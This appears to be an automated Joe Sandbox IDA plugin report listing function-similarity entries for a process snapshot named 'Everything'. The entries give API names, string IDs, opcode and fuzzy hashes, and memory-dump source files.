                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapPerformanceQuery$AllocCounterErrorFrequencyLastProcess
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 2649382330-1087158519
                                                                                                            • Opcode ID: 53f26956c2515177eff097131a945b8a36a111b2edb930b1962b23cd3ac931b0
                                                                                                            • Instruction ID: 5752145b18a00f8629908cbc76505659b229b2c892caecf0e6c4c3706f91caa4
                                                                                                            • Opcode Fuzzy Hash: 53f26956c2515177eff097131a945b8a36a111b2edb930b1962b23cd3ac931b0
                                                                                                            • Instruction Fuzzy Hash: DF519176A1874A82E760CF96E58066D73A6FB497A0F004035EF5E83B64EF3CE454DB41
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32 ref: 00007FF63D55A9FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 158728112-1087158519
                                                                                                            • Opcode ID: a89502b4466c6d1ae79752786ede0b557e249909c592ea7ffd52a5e9daade266
                                                                                                            • Instruction ID: 1959de3389b7d0ebd3f86fd754fca5fea8de47b8ff01ae89abbb735ae51b036d
                                                                                                            • Opcode Fuzzy Hash: a89502b4466c6d1ae79752786ede0b557e249909c592ea7ffd52a5e9daade266
                                                                                                            • Instruction Fuzzy Hash: E341D332A08B1A86EB518BA1E4402AD73B1FB49BA4F144136DE4D87395EF3CF845E781
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,00007FF63D55B45D,?,?,?,?,?,?,00007FF63D4808B0), ref: 00007FF63D559F93
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 158728112-1087158519
                                                                                                            • Opcode ID: ab5d467a5c1242f41781bed6b33b2b45eca77d11241a114a5bd1128b0375b161
                                                                                                            • Instruction ID: a29252c9a02a7633ed678435e1e36b4b83482b73d2382cbb26a1a51ce0f396eb
                                                                                                            • Opcode Fuzzy Hash: ab5d467a5c1242f41781bed6b33b2b45eca77d11241a114a5bd1128b0375b161
                                                                                                            • Instruction Fuzzy Hash: BA31B875E0834B86E7129BA2E44027A7292BF44BA8F144035DE4EC7755FF3CE445EB80
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32 ref: 00007FF63D55A8B3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 158728112-1087158519
                                                                                                            • Opcode ID: 2b4cd00eb4fef286c884df93757ad18178468b3bcc28ca954b145cd2307e33d6
                                                                                                            • Instruction ID: 3bb8b658050b0351d9927244ec01ff85adf95655ed876e32f271d8adeda25c64
                                                                                                            • Opcode Fuzzy Hash: 2b4cd00eb4fef286c884df93757ad18178468b3bcc28ca954b145cd2307e33d6
                                                                                                            • Instruction Fuzzy Hash: 6341A032E0870AC6EB118BA5E44026D73A2FB58B58F144136DA4DC7795EF3CF546E781
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,00007FF63D55983A,?,?,?,?,?,?,?,?,00007FF63D523402), ref: 00007FF63D559392
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 158728112-1087158519
                                                                                                            • Opcode ID: 666a7b1e0861cf966c0a57408d503636f3e29c333a1cafa7117ac0fe5ed89fd5
                                                                                                            • Instruction ID: 5f559794cd27fdf9d451e5980468f20158b570d29dfd9c2f238f6f16a5fa59a3
                                                                                                            • Opcode Fuzzy Hash: 666a7b1e0861cf966c0a57408d503636f3e29c333a1cafa7117ac0fe5ed89fd5
                                                                                                            • Instruction Fuzzy Hash: 0B31A771F0865AC2E7118B92E44017D67A1BB94BD8F144035DE5EC7795EF3CE845EB80
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$DriveInformationTypeVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 1367569756-0
                                                                                                            • Opcode ID: ff5d218dc7fa123cfe3235317a48335da5b91f6c87b3adc2018308f984ac80c0
                                                                                                            • Instruction ID: 10847e759d5c85a417f8f0c026cf924095ac923b5fa79443b17a57a431a461b4
                                                                                                            • Opcode Fuzzy Hash: ff5d218dc7fa123cfe3235317a48335da5b91f6c87b3adc2018308f984ac80c0
                                                                                                            • Instruction Fuzzy Hash: D431D166A0CA8A81FB609BA4E0413BAA3B1EFC5B94F045035EE4D87759FF3DD410AB40
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 1733017098-0
                                                                                                            • Opcode ID: edcdeb1883e529be76b393e3e48757de2a8533053853252b41e6f19d18bbfc60
                                                                                                            • Instruction ID: 61eca349bc8015b5aea92319cdb1cc97359fe5a7cb03e9c6e063ced6d6507d05
                                                                                                            • Opcode Fuzzy Hash: edcdeb1883e529be76b393e3e48757de2a8533053853252b41e6f19d18bbfc60
                                                                                                            • Instruction Fuzzy Hash: E631A136A18BC486EA60DB55F8406ABB360FB897A4F441035FE8D83B99EF3CD444DB00
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00007FF63D4B8320), ref: 00007FF63D55AF8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 158728112-1087158519
                                                                                                            • Opcode ID: de59609ac9f3f0b887c31955c6347065d7faf55dec1f77600a2611164f7b8fd5
                                                                                                            • Instruction ID: 4c4e286b50570e176f5913ef31ed9617810ef458e86d5ef543ba78acd1a4eb11
                                                                                                            • Opcode Fuzzy Hash: de59609ac9f3f0b887c31955c6347065d7faf55dec1f77600a2611164f7b8fd5
                                                                                                            • Instruction Fuzzy Hash: 6F316F76E0824A86FB119BE1E4412B972A2AF59368F044035DA0DC6785FF3CF889E741
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00007FF63D4B8360), ref: 00007FF63D55B41F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                            • String ID: _service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$set last error %d
                                                                                                            • API String ID: 158728112-1087158519
                                                                                                            • Opcode ID: f1a7726f87e4224b62e477d22a3fe26a7d517ea488ba5ff861bdbd984e06ddcf
                                                                                                            • Instruction ID: 95705cf789b16367a44b969581c72d6e077e8ec714e761596ecdd735b38821b7
                                                                                                            • Opcode Fuzzy Hash: f1a7726f87e4224b62e477d22a3fe26a7d517ea488ba5ff861bdbd984e06ddcf
                                                                                                            • Instruction Fuzzy Hash: 4B317432E0814A96FB129BE1E4453B97262AF55368F144035DA0ECB785FF3CE885E741
                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D4BE903,?,?,?,00007FF63D4960D4), ref: 00007FF63D55A730
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D4BE903,?,?,?,00007FF63D4960D4), ref: 00007FF63D55A747
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                            • String ID: service client monitor clear all$service client monitor clear all2
                                                                                                            • API String ID: 3168844106-2141642881
                                                                                                            • Opcode ID: 9c02d8c00be8c2d01a666b119a0ffc9666270f15cfdc08f6f104b854b6e9aab1
                                                                                                            • Instruction ID: 61adfef5485a23f019e69caa25d4baaeeaf76dfe3ebcc95e1e723501cb1fe1f1
                                                                                                            • Opcode Fuzzy Hash: 9c02d8c00be8c2d01a666b119a0ffc9666270f15cfdc08f6f104b854b6e9aab1
                                                                                                            • Instruction Fuzzy Hash: FFF06D72A1855B92E7549BA0E5957EAB731FB94348F400131DA2D83AA5EF3CD16CEB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryWindows
                                                                                                            • String ID: %systemroot%
                                                                                                            • API String ID: 3619848164-3112198089
                                                                                                            • Opcode ID: 78eb9637c3925ed78c97ee98ab3d943104c4efc5a7d8245cb03895af0dfdeb3b
                                                                                                            • Instruction ID: 7dfef34d3a9f0e681f9ba92a454553b12e73c15b004c8382991ca6b0f2d7feed
                                                                                                            • Opcode Fuzzy Hash: 78eb9637c3925ed78c97ee98ab3d943104c4efc5a7d8245cb03895af0dfdeb3b
                                                                                                            • Instruction Fuzzy Hash: 7A411522E1C6DA42FA729BA5E4502FE63A1BFC5790F444031DE8E83799EE3CD501EB40
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorLastThread
                                                                                                            • String ID: mem_alloc
                                                                                                            • API String ID: 1689873465-1713776653
                                                                                                            • Opcode ID: 517fbeb5d1630c79a0ffb439fa244e39bffd5084e405505b6b4181d511319ccd
                                                                                                            • Instruction ID: 0f3e46da4d68a29584aad7284e17027e5e4bbba3cdafb1fdbc6eb77eba39321d
                                                                                                            • Opcode Fuzzy Hash: 517fbeb5d1630c79a0ffb439fa244e39bffd5084e405505b6b4181d511319ccd
                                                                                                            • Instruction Fuzzy Hash: 5021B771E0875586F714AFE5A9412BA7391BF867A4F040236EEBD83B86EF3CD411B600
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
